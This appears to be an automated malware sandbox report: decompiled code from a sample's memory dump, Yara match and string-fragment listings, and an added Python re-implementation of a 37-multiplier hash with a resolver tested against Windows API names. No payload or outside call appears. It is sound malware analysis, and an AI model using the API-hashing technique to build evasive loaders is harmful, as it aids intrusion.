                                                        					L3:
                                                        					_t404 = _t403 - 1;
                                                        					if(_t404 == 0) {
                                                        						L16:
                                                        						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                        						L17:
                                                        						_t426 = _v40;
                                                        						_v20 = _t426 + 0x1c;
                                                        						_t177 = L1E28FAD0(_t426 + 0x1c);
                                                        						_t385 = 0;
                                                        						while(1) {
                                                        							L18:
                                                        							_t405 =  *(_t426 + 4);
                                                        							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
                                                        							_t316 = _t289 & _t179;
                                                        							_v24 = _t179;
                                                        							_v32 = _t316;
                                                        							_v12 = _t316 >> 0x18;
                                                        							_v36 = _t316 >> 0x10;
                                                        							_v28 = _t316 >> 8;
                                                        							if(_t385 != 0) {
                                                        								goto L21;
                                                        							}
                                                        							_t418 = _t405 >> 5;
                                                        							if(_t418 == 0) {
                                                        								_t406 = 0;
                                                        								L31:
                                                        								if(_t406 == 0) {
                                                        									L35:
                                                        									E1E28FA00(_t289, _t316, _t406, _t426 + 0x1c);
                                                        									 *0x1e35b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
                                                        									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
                                                        									_v36 = _t319;
                                                        									if(_t319 != 0) {
                                                        										asm("stosd");
                                                        										asm("stosd");
                                                        										asm("stosd");
                                                        										_t408 = _v16;
                                                        										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
                                                        										 *((char*)(_t319 + 0xb)) =  *_v16;
                                                        										 *(_t319 + 4) = _t289;
                                                        										_t53 = _t319 + 0xc; // 0xc
                                                        										E1E282280(E1E2AF3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
                                                        										_t428 = _v40;
                                                        										_t386 = 0;
                                                        										while(1) {
                                                        											L38:
                                                        											_t202 =  *(_t428 + 4);
                                                        											_v16 = _v16 | 0xffffffff;
                                                        											_v16 = _v16 << (_t202 & 0x0000001f);
                                                        											_t323 = _v16 & _t289;
                                                        											_v20 = _t323;
                                                        											_v20 = _v20 >> 0x18;
                                                        											_v28 = _t323;
                                                        											_v28 = _v28 >> 0x10;
                                                        											_v12 = _t323;
                                                        											_v12 = _v12 >> 8;
                                                        											_v32 = _t323;
                                                        											if(_t386 != 0) {
                                                        												goto L41;
                                                        											}
                                                        											_t247 = _t202 >> 5;
                                                        											_v24 = _t247;
                                                        											if(_t247 == 0) {
                                                        												_t412 = 0;
                                                        												L50:
                                                        												if(_t412 == 0) {
                                                        													L53:
                                                        													_t291 =  *(_t428 + 4);
                                                        													_v28 =  *((intOrPtr*)(_t428 + 0x28));
                                                        													_v44 =  *(_t428 + 0x24);
                                                        													_v32 =  *((intOrPtr*)(_t428 + 0x20));
                                                        													_t207 = _t291 >> 5;
                                                        													if( *_t428 < _t207 + _t207) {
                                                        														L74:
                                                        														_t430 = _t291 >> 5;
                                                        														_t293 = _v36;
                                                        														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
                                                        														_v44 = _t210;
                                                        														_t159 = _t430 - 1; // 0xffffffdf
                                                        														_t428 = _v40;
                                                        														_t330 =  *(_t428 + 8);
                                                        														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                                                        														_t412 = _t293;
                                                        														 *_t293 =  *(_t330 + _t386 * 4);
                                                        														 *(_t330 + _t386 * 4) = _t293;
                                                        														 *_t428 =  *_t428 + 1;
                                                        														_t289 = 0;
                                                        														L75:
                                                        														E1E27FFB0(_t289, _t412, _t428 + 0x1c);
                                                        														if(_t289 != 0) {
                                                        															_t428 =  *(_t428 + 0x24);
                                                        															 *0x1e35b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
                                                        															 *_t428();
                                                        														}
                                                        														L77:
                                                        														return E1E2AB640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
                                                        													}
                                                        													_t334 = 2;
                                                        													_t207 = E1E29F3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
                                                        													if(_t207 < 0) {
                                                        														goto L74;
                                                        													}
                                                        													_t413 = _v24;
                                                        													if(_t413 < 4) {
                                                        														_t413 = 4;
                                                        													}
                                                        													 *0x1e35b1e0(_t413 << 2, _v28);
                                                        													_t207 =  *_v32();
                                                        													_t386 = _t207;
                                                        													_v16 = _t386;
                                                        													if(_t386 == 0) {
                                                        														_t291 =  *(_t428 + 4);
                                                        														if(_t291 >= 0x20) {
                                                        															goto L74;
                                                        														}
                                                        														_t289 = _v36;
                                                        														_t412 = 0;
                                                        														goto L75;
                                                        													} else {
                                                        														_t108 = _t413 - 1; // 0x3
                                                        														_t337 = _t108;
                                                        														if((_t413 & _t337) == 0) {
                                                        															L62:
                                                        															if(_t413 > 0x4000000) {
                                                        																_t413 = 0x4000000;
                                                        															}
                                                        															_t295 = _t386;
                                                        															_v24 = _v24 & 0x00000000;
                                                        															_t392 = _t413 << 2;
                                                        															_t230 = _t428 | 0x00000001;
                                                        															_t393 = _t392 >> 2;
                                                        															asm("sbb ecx, ecx");
                                                        															_t341 =  !(_v16 + _t392) & _t393;
                                                        															if(_t341 <= 0) {
                                                        																L67:
                                                        																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
                                                        																_v32 = _t395;
                                                        																_v20 = 0;
                                                        																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
                                                        																	L72:
                                                        																	_t345 =  *(_t428 + 8);
                                                        																	_t207 = _v16;
                                                        																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
                                                        																	 *(_t428 + 8) = _t207;
                                                        																	 *(_t428 + 4) = _t291;
                                                        																	if(_t345 != 0) {
                                                        																		 *0x1e35b1e0(_t345, _v28);
                                                        																		_t207 =  *_v44();
                                                        																		_t291 =  *(_t428 + 4);
                                                        																	}
                                                        																	goto L74;
                                                        																} else {
                                                        																	goto L68;
                                                        																}
                                                        																do {
                                                        																	L68:
                                                        																	_t298 =  *(_t428 + 8);
                                                        																	_t431 = _v20;
                                                        																	_v12 = _t298;
                                                        																	while(1) {
                                                        																		_t347 =  *(_t298 + _t431 * 4);
                                                        																		_v24 = _t347;
                                                        																		if((_t347 & 0x00000001) != 0) {
                                                        																			goto L71;
                                                        																		}
                                                        																		 *(_t298 + _t431 * 4) =  *_t347;
                                                        																		_t300 =  *(_t347 + 4) & _t395;
                                                        																		_t398 = _v16;
                                                        																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                                                        																		_t303 = _v24;
                                                        																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
                                                        																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
                                                        																		_t395 = _v32;
                                                        																		_t298 = _v12;
                                                        																	}
                                                        																	L71:
                                                        																	_v20 = _t431 + 1;
                                                        																	_t428 = _v40;
                                                        																} while (_v20 <  *(_t428 + 4) >> 5);
                                                        																goto L72;
                                                        															} else {
                                                        																_t399 = _v24;
                                                        																do {
                                                        																	_t399 = _t399 + 1;
                                                        																	 *_t295 = _t230;
                                                        																	_t295 = _t295 + 4;
                                                        																} while (_t399 < _t341);
                                                        																goto L67;
                                                        															}
                                                        														}
                                                        														_t354 = _t337 | 0xffffffff;
                                                        														if(_t413 == 0) {
                                                        															L61:
                                                        															_t413 = 1 << _t354;
                                                        															goto L62;
                                                        														} else {
                                                        															goto L60;
                                                        														}
                                                        														do {
                                                        															L60:
                                                        															_t354 = _t354 + 1;
                                                        															_t413 = _t413 >> 1;
                                                        														} while (_t413 != 0);
                                                        														goto L61;
                                                        													}
                                                        												}
                                                        												_t89 = _t412 + 8; // 0x8
                                                        												_t244 = E1E33E7A8(_t89);
                                                        												_t289 = _v36;
                                                        												if(_t244 == 0) {
                                                        													_t412 = 0;
                                                        												}
                                                        												goto L75;
                                                        											}
                                                        											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
                                                        											_t323 = _v32;
                                                        											while(1) {
                                                        												L41:
                                                        												_t386 =  *_t386;
                                                        												_v12 = _t386;
                                                        												if((_t386 & 0x00000001) != 0) {
                                                        													break;
                                                        												}
                                                        												if(_t323 == ( *(_t386 + 4) & _v16)) {
                                                        													L45:
                                                        													if(_t386 == 0) {
                                                        														goto L53;
                                                        													}
                                                        													if(E1E33E7EB(_t386, _t408) != 0) {
                                                        														_t412 = _v12;
                                                        														goto L50;
                                                        													}
                                                        													_t386 = _v12;
                                                        													goto L38;
                                                        												}
                                                        											}
                                                        											_t386 = 0;
                                                        											_v12 = 0;
                                                        											goto L45;
                                                        										}
                                                        									}
                                                        									_t412 = 0;
                                                        									goto L77;
                                                        								}
                                                        								_t38 = _t406 + 8; // 0x8
                                                        								_t364 = _t38;
                                                        								if(E1E33E7A8(_t38) == 0) {
                                                        									_t406 = 0;
                                                        								}
                                                        								E1E28FA00(_t289, _t364, _t406, _v20);
                                                        								goto L77;
                                                        							}
                                                        							_t24 = _t418 - 1; // -1
                                                        							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
                                                        							_t316 = _v32;
                                                        							L21:
                                                        							_t406 = _v24;
                                                        							while(1) {
                                                        								_t385 =  *_t385;
                                                        								_v12 = _t385;
                                                        								if((_t385 & 0x00000001) != 0) {
                                                        									break;
                                                        								}
                                                        								if(_t316 == ( *(_t385 + 4) & _t406)) {
                                                        									L26:
                                                        									if(_t385 == 0) {
                                                        										goto L35;
                                                        									}
                                                        									_t177 = E1E33E7EB(_t385, _v16);
                                                        									if(_t177 != 0) {
                                                        										_t406 = _v12;
                                                        										goto L31;
                                                        									}
                                                        									_t385 = _v12;
                                                        									goto L18;
                                                        								}
                                                        							}
                                                        							_t385 = 0;
                                                        							_v12 = 0;
                                                        							goto L26;
                                                        						}
                                                        					}
                                                        					_t419 = _t404 - 1;
                                                        					if(_t419 == 0) {
                                                        						L15:
                                                        						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                        						_t425 =  &(_t425[1]);
                                                        						goto L16;
                                                        					}
                                                        					_t420 = _t419 - 1;
                                                        					if(_t420 == 0) {
                                                        						L14:
                                                        						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                        						_t425 =  &(_t425[1]);
                                                        						goto L15;
                                                        					}
                                                        					_t421 = _t420 - 1;
                                                        					if(_t421 == 0) {
                                                        						L13:
                                                        						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                        						_t425 =  &(_t425[1]);
                                                        						goto L14;
                                                        					}
                                                        					_t422 = _t421 - 1;
                                                        					if(_t422 == 0) {
                                                        						L12:
                                                        						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                        						_t425 =  &(_t425[1]);
                                                        						goto L13;
                                                        					}
                                                        					_t423 = _t422 - 1;
                                                        					if(_t423 == 0) {
                                                        						L11:
                                                        						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                        						_t425 =  &(_t425[1]);
                                                        						goto L12;
                                                        					}
                                                        					if(_t423 != 1) {
                                                        						goto L17;
                                                        					} else {
                                                        						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                        						_t425 =  &(_t425[1]);
                                                        						goto L11;
                                                        					}
                                                        				} else {
                                                        					_t401 = _t403 >> 3;
                                                        					_t403 = _t403 + _t401 * 0xfffffff8;
                                                        					do {
                                                        						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
                                                        						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
                                                        						_t288 = _t425[7] & 0x000000ff;
                                                        						_t425 =  &(_t425[8]);
                                                        						_t289 = _t310 + _t383 + _t288;
                                                        						_t401 = _t401 - 1;
                                                        					} while (_t401 != 0);
                                                        					goto L3;
                                                        				}
                                                        			}
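The routine whose tail is decompiled above, reconstructed as an added example (this is not code from the report or from the sample). Read as a whole, the fragment is a string hash: every step multiplies a 32-bit accumulator (_t289) by 0x25 (37) and adds the next byte, and the do/while at the bottom applies the same recurrence eight bytes at a time using the precomputed constants 0x1a617d0d and -0x2fe8ed1f, which are 37^7 and 37^8 reduced modulo 2^32. The code below implements both the byte-at-a-time form and a mirror of the unrolled form, checks that they agree and that the constants are what they appear to be, and shows how an analyst tests candidate strings against a recovered hash value. Assumptions: the accumulator's initial value is not visible in this fragment, so it is a seed parameter defaulting to 0; the candidate name list is constructed for the demonstration; nothing on this page says what the sample hashes with this routine, so the API-name use is only the usual reason such hashes turn up in a loader.

```python
"""Added example: re-implementation of the 0x25-multiplier hash decompiled
above. Not the sample's code; the initial accumulator value (the seed) is
not visible in the fragment and is assumed to default to 0."""

MASK32 = 0xFFFFFFFF
MULT = 0x25  # the 0x25 (37) multiplier used at every step of the routine

# The two constants from the unrolled do/while loop in the decompiled code:
K7 = 0x1A617D0D                 # == 37**7 mod 2**32
K8 = (-0x2FE8ED1F) & MASK32     # == 37**8 mod 2**32 (0xD01712E1)


def hash37_simple(data: bytes, seed: int = 0) -> int:
    """Byte-at-a-time Horner form: h = (h * 37 + byte) mod 2**32."""
    h = seed & MASK32
    for b in data:
        h = (h * MULT + b) & MASK32
    return h


def hash37_unrolled(data: bytes, seed: int = 0) -> int:
    """Mirror of the decompiled control flow: full 8-byte blocks through
    the do/while body, then the 0..7 leftover bytes one at a time (the
    L17 -> L11 fall-through chain in the decompiled code)."""
    h = seed & MASK32
    full_blocks, rest = len(data) >> 3, len(data) & 7   # _t401 and _t403
    pos = 0
    for _ in range(full_blocks):
        blk = data[pos:pos + 8]
        # _t383: Horner over bytes 1..6, times 37, minus h * 0x2fe8ed1f
        # (subtracting h*0x2fe8ed1f is adding h*37**8 modulo 2**32)
        t383 = 0
        for b in blk[1:7]:
            t383 = t383 * MULT + b
        t383 = (t383 * MULT - h * 0x2FE8ED1F) & MASK32
        t310 = (blk[0] * K7) & MASK32          # byte 0 weighted by 37**7
        h = (t310 + t383 + blk[7]) & MASK32    # byte 7 weighted by 37**0
        pos += 8
    for b in data[pos:pos + rest]:
        h = (h * MULT + b) & MASK32
    return h


def resolve(target: int, candidates, seed: int = 0):
    """Return the first candidate string whose hash equals target, or None.
    This is how an analyst tests a recovered hash value against a list of
    export names; the list itself has to come from the DLLs of interest."""
    for name in candidates:
        if hash37_simple(name.encode("ascii"), seed) == target:
            return name
    return None


# Constructed candidate list for the demonstration (not taken from the sample).
CANDIDATES = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc",
    "CreateProcessW", "NtUnmapViewOfSection", "ZwSetInformationThread",
]


if __name__ == "__main__":
    # The unrolled constants are exactly 37**7 and 37**8 modulo 2**32.
    assert pow(MULT, 7, 1 << 32) == K7 and pow(MULT, 8, 1 << 32) == K8
    for name in CANDIDATES:
        h = hash37_simple(name.encode("ascii"))
        assert h == hash37_unrolled(name.encode("ascii"))
        print(f"{name:24s} 0x{h:08x}  ->  {resolve(h, CANDIDATES)}")
```

If the seed turns out to be non-zero in the part of the function not shown here, or the hash is combined with a DLL-name hash before comparison, the lookup has to be adjusted accordingly; the two forms above still agree for any seed, so the reconstruction itself does not depend on it.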
                                                        (Instruction address column for the function above, 0x1e33e833 - 0x1e33ed4e in the dump based at 1E240000; the per-line mapping of addresses to the decompiled code did not survive extraction.)

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, Offset: 1E240000, based on PE: true
                                                        • Associated: 00000001.00000002.320025729.000000001E35B000.00000040.00000001.sdmp
                                                        • Associated: 00000001.00000002.320033277.000000001E35F000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: ea8b5b873dd64c281dd33cbea4768fa45533730637bd43f76bcb31c49ba90544
                                                        • Instruction ID: fe1675b3dee79ce79f03d2444789501cd4e400252791b30706fd5219b1c646fd
                                                        • Opcode Fuzzy Hash: ea8b5b873dd64c281dd33cbea4768fa45533730637bd43f76bcb31c49ba90544
                                                        • Instruction Fuzzy Hash: 2E02A472E007568FCB18CF6AC8D1A7EBBF6AF88201725466DE456DB780D734E941CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: C$a$b$d$i
                                                        • API String ID: 0-2334916691
                                                        • Opcode ID: 4d95290923609155690dd0bb0d7c395c1c1b394e4985f643acf69f6cd47b1387
                                                        • Instruction ID: bca95fac23e3fb0a0d263138f03d510d3b9a9baa6c4fc5de7a3e1d25116ce8f6
                                                        • Opcode Fuzzy Hash: 4d95290923609155690dd0bb0d7c395c1c1b394e4985f643acf69f6cd47b1387
                                                        • Instruction Fuzzy Hash: 7131A372A04208ABD710DFA0DC41FFEB7B9EF85714F00851DF519A7242EBB5550187A9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                        • API String ID: 0-3236418099
                                                        • Opcode ID: 50dbae069494f72177b0dc956704eb85f4bbe083d0ddb717c9771b9aa67ccc2d
                                                        • Instruction ID: e7c14f5bae1b5b65c6ea1b7de319ad05efecf480b9b5f075d141ca7c82b4ca02
                                                        • Opcode Fuzzy Hash: 50dbae069494f72177b0dc956704eb85f4bbe083d0ddb717c9771b9aa67ccc2d
                                                        • Instruction Fuzzy Hash: 6B818FB1D0021CAEEB60DF94DC45FEEB7BDEF45304F0041A9E608A6142EBB55A85CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: C$D$I$\$a$a$c$e$e$l$n$o$o$r$r$s$s$t$y
                                                        • API String ID: 0-2101568155
                                                        • Opcode ID: afa046bdf6afc22409e305749ee05c96e74e39756b9dd64447c34cb05de1f67d
                                                        • Instruction ID: 3f64f9f0080269cca2d02a308fcb683ab53b9a2e67e2b9bf09b2552ae6235415
                                                        • Opcode Fuzzy Hash: afa046bdf6afc22409e305749ee05c96e74e39756b9dd64447c34cb05de1f67d
                                                        • Instruction Fuzzy Hash: 239184B1900218AFEB10DF94DC81FFF77B9EF45704F004199FA08AA242E7B59A45CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -$[$[$[$[$[$]$]$]$]$]$a$e$e$l$n$s
                                                        • API String ID: 0-2169243036
                                                        • Opcode ID: 1ff597a0faeace019345220b2917f8a94f923f4ebc41c16a518652564f380a51
                                                        • Instruction ID: 19e7f23f5961d42a993e256c073f10d6ae1cf5426229e1cef443c8a231841fd5
                                                        • Opcode Fuzzy Hash: 1ff597a0faeace019345220b2917f8a94f923f4ebc41c16a518652564f380a51
                                                        • Instruction Fuzzy Hash: EDB194B1940708BEE721EBA0CC46FEF77BCAF95704F10450DF61A6A183D7B46A048BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -$[$[$[$[$[$]$]$]$]$]$a$e$e$l$n$s
                                                        • API String ID: 0-2169243036
                                                        • Opcode ID: 3d04e503740df913217a3e4f3acea5944beeb63c5283132e6549b8de81ba1bee
                                                        • Instruction ID: 29ac62a1034f4604b30f40ed640d1e213c812cc010e24f2ff3de7819b7b672aa
                                                        • Opcode Fuzzy Hash: 3d04e503740df913217a3e4f3acea5944beeb63c5283132e6549b8de81ba1bee
                                                        • Instruction Fuzzy Hash: 14A174B1940708BAE721EFA4CC46FEF77BDAF85704F10450DF6196A183DBB46A048BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .$a$a$e$e$e$g$g$i$i$i$j$p$p
                                                        • API String ID: 0-4291551930
                                                        • Opcode ID: 303ef244b2833382ea5bfa3f779d4ff6f1c2b407e5361214df37d93f081ac8fb
                                                        • Instruction ID: 6b74928f5bc5a3819ba1ac1afb9af5fba7d15bc45b65ff592c2cb4a8007aaeea
                                                        • Opcode Fuzzy Hash: 303ef244b2833382ea5bfa3f779d4ff6f1c2b407e5361214df37d93f081ac8fb
                                                        • Instruction Fuzzy Hash: 02914F71900708EFDB60DF94CD81BEEB7F9AF88B00F144659E509A7641E775AA84CF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .$a$a$e$e$e$g$g$i$i$i$j$p$p
                                                        • API String ID: 0-4291551930
                                                        • Opcode ID: 3ba988212448dd80929e1fc219b27536cec704525788c098fa539b7819e11330
                                                        • Instruction ID: e2216f4ec3cdc32ae685543b05467bdd1ded5bc5b8846a9fd7bad23579d1f4ad
                                                        • Opcode Fuzzy Hash: 3ba988212448dd80929e1fc219b27536cec704525788c098fa539b7819e11330
                                                        • Instruction Fuzzy Hash: C9916F71900708EFDB60DF94CD81BEEB7F9AF88B00F144669E509A7241E775AA84CF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                        • API String ID: 0-392141074
                                                        • Opcode ID: 6d38a37dddbf03812769f72ff4792f0ccaa2fbf3c0127631d9b00a6b9815caac
                                                        • Instruction ID: a918445db95bc36bb22261a8d16e602a3b8980c5a36e5711d2f382256670d40b
                                                        • Opcode Fuzzy Hash: 6d38a37dddbf03812769f72ff4792f0ccaa2fbf3c0127631d9b00a6b9815caac
                                                        • Instruction Fuzzy Hash: 4A613EB1D1121CAEEB20DFA4DC85FEEB7B9FF08704F044199E509A6182EBB156448BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                        • API String ID: 0-392141074
                                                        • Opcode ID: 8d77598205e28dcfe4edd4b7da87440968df27c1568679f72b701acfb0c604d7
                                                        • Instruction ID: 0027c24a19135aa27fa20cf44d35d1095eadeae33cae882814c8586aed6072a3
                                                        • Opcode Fuzzy Hash: 8d77598205e28dcfe4edd4b7da87440968df27c1568679f72b701acfb0c604d7
                                                        • Instruction Fuzzy Hash: EC512FB1D1131CAEEB20DFA4DC85FEEBBB9FF08704F044159E505A6182EBB156488FA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$N$e$e$n$o$r$y
                                                        • API String ID: 0-157158463
                                                        • Opcode ID: 39cd1a5ac2d306f7f1d8e0851c75e524d10f6041a92f2df489c2bb1cd57e7e7f
                                                        • Instruction ID: 7684fae9d6d69e6da52db4aaeb42bf8377b4892f8aebc7af7575d7a5019c169a
                                                        • Opcode Fuzzy Hash: 39cd1a5ac2d306f7f1d8e0851c75e524d10f6041a92f2df489c2bb1cd57e7e7f
                                                        • Instruction Fuzzy Hash: 806151B1E0030CAFDB60DFA4D885BEEB7F9EF49700F004559E509E7641EB759A448BA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$N$e$e$n$o$r$y
                                                        • API String ID: 0-157158463
                                                        • Opcode ID: fe2bac3f2554d6839a96cc709099239d1d9645dce51afb834e030bff7298a174
                                                        • Instruction ID: fc998393a5cff8d8b54280e86880a8bdf97d1eb096dc44514a4b2d2800893b62
                                                        • Opcode Fuzzy Hash: fe2bac3f2554d6839a96cc709099239d1d9645dce51afb834e030bff7298a174
                                                        • Instruction Fuzzy Hash: 515150B1D0030CAFDB60DFA4D885BEEB7F9EF49700F00455DE509A7241EBB59A448BA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: C$U$a$b$d$i$k$n$o
                                                        • API String ID: 0-3121204512
                                                        • Opcode ID: be6cb18e5eec7a021662cb67d95f7c97fa91f0ca95ca833c62488018b7729fed
                                                        • Instruction ID: 4339f0dcea317344d38281af7e351bd4ec8707db8bc7687d192ddf8c5c132d3f
                                                        • Opcode Fuzzy Hash: be6cb18e5eec7a021662cb67d95f7c97fa91f0ca95ca833c62488018b7729fed
                                                        • Instruction Fuzzy Hash: 454161B190030CAFDB10EFA0DC45BEFB7B9EF45704F00851DE519A7242DBB569058BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: URL: $.$L: $e$i$n$o$p
                                                        • API String ID: 0-3631070777
                                                        • Opcode ID: 9ddb18a872856f4c221e0ba63600c8ba8755dc245e705d23e5cb427cee786466
                                                        • Instruction ID: cbf18203cea94e532ed8124cf784a9c5bc4ad557493e8d8cddf6b6586ba66ebb
                                                        • Opcode Fuzzy Hash: 9ddb18a872856f4c221e0ba63600c8ba8755dc245e705d23e5cb427cee786466
                                                        • Instruction Fuzzy Hash: 75811CB1900308AFDB20DFA4CC81BEFB7F9EF44704F044529E519AB252E7B1A945CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: F$P$T$f$r$x
                                                        • API String ID: 0-2523166886
                                                        • Opcode ID: f69a521eb55b1ca32e06d3941bc5a91e1205376e735f3a91f233aada2803425b
                                                        • Instruction ID: a857af388b663d016779b92096cac42eccb371e73fda0edf0c9fe9bb92b4dbcd
                                                        • Opcode Fuzzy Hash: f69a521eb55b1ca32e06d3941bc5a91e1205376e735f3a91f233aada2803425b
                                                        • Instruction Fuzzy Hash: F751B4B1900309ABEB74DBE4CC45BFBB3F8EF05704F044569E50996582E7B4AA44CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: P$e$i$m$o$r
                                                        • API String ID: 0-4274970381
